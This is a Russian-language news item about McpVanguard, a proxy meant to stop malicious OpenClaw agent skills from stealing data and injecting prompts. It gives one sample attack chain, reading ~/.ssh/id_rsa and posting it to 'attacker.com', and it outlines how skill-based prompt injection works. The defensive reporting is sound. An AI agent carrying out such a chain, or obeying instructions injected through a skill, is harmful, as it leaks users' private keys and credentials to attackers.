Прокси-сервер McpVanguard блокирует эксфильтрацию данных навыка OpenClaw

В ответ на обнаружение командой безопасности ИИ Cisco сторонних навыков OpenClaw, выполняющих скрытую утечку данных и инъекцию промптов, разработчик выпустил McpVanguard — прокси, предназначенный для размещения между ИИ-агентом и его инструментами, чтобы блокировать вредоносные вызовы до их выполнения.
Проблема: Цепочки вредоносных вызовов
Проблема безопасности заключается не в ошибке самого OpenClaw, а в последствиях предоставления агентам доступа к файловой системе, выполнения команд оболочки и сетевых вызовов без границ принуждения. Тестирование Cisco выявило схему, когда, казалось бы, безобидные отдельные вызовы объединяются для создания утечки, например:
read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)Ни один из вызовов по отдельности не выглядит вредоносным, но вместе они приводят к утечке конфиденциальных данных. Согласно источнику, на пике в ClawHub было более 820 вредоносных навыков, а уязвимость CVE-2026-25253 позволяла злоумышленникам добиться удалённого выполнения кода через одну вредоносную ссылку. Текущая проверка на уровне навыков не позволяет обнаружить такие цепочки вызовов.
Решение: Прокси McpVanguard
McpVanguard решает эту проблему, перехватывая вызовы между агентом и его инструментами. Он использует три метода обнаружения:
- Сопоставление с образцом
- Оценка семантического намерения
- Обнаружение поведенческих цепочек за всю сессию
Установка осуществляется через pip: pip install mcp-vanguard.
Более глубокий слой: Протокол VEX
Проект включает более глубокий слой безопасности под названием VEX Protocol, описанный как система «бортового самописца». Он предоставляет:
- Аудит-трейлы Меркла для журналирования с защитой от несанкционированного изменения
- Верификацию идентичности агента, основанную на TPM
- Принуждение на уровне системных вызовов
Протокол VEX написан на Rust, и его разработка началась в декабре 2023 года, до того как OpenClaw получил широкую популярность. В источнике отмечается, что NVIDIA недавно выпустила NemoClaw для аналогичных целей безопасности, что указывает на то, что угрозы такого типа никуда не исчезнут.
Оба проекта доступны на GitHub:
📖 Read the full source: r/openclaw
👀 Смотрите также

Выход Agent-Drift Security Tool версии 0.1.2: Шаг вперед в области безопасности ИИ
Инструмент безопасности Agent-Drift v0.1.2 теперь доступен, предлагая улучшенные функции безопасности для кодирующих агентов ИИ. Этот обновленный вариант решает ключевые проблемы безопасности в автоматизации.

Плагин SupraWall MCP блокирует атаки внедрения промптов в локальных ИИ-агентах.
SupraWall — это плагин MCP, который перехватывает и блокирует попытки утечки конфиденциальных данных от ИИ-агентов, что было продемонстрировано в ходе испытания «красной командой», где он предотвратил утечку учетных данных через атаки внедрения промптов.

Исследователи в области ИИ-безопасности: ваши уязвимости нулевого дня могут быть раскрыты через функцию согласия на передачу данных
Переключатель 'Улучшить модель для всех' в интерфейсах LLM может автоматически собирать глубокие исследования red-teaming, отправляя ваши концепции уязвимостей командам безопасности поставщиков и потенциально в академические статьи до вашей публикации. Отключите обмен данными перед проведением серьёзных исследований безопасности.

Ошибка плагина Claude Code вызывает скачки потребления процессора и разрядку аккумулятора.
Пользователь обнаружил, что плагин Claude Code для Telegram создает несколько процессов bun.exe, которые работают на 100% загрузки ЦП даже при закрытой крышке ноутбука, вызывая быстрый разряд батареи. Процессы сохраняются после циклов сна/пробуждения и требуют специальных шагов для удаления.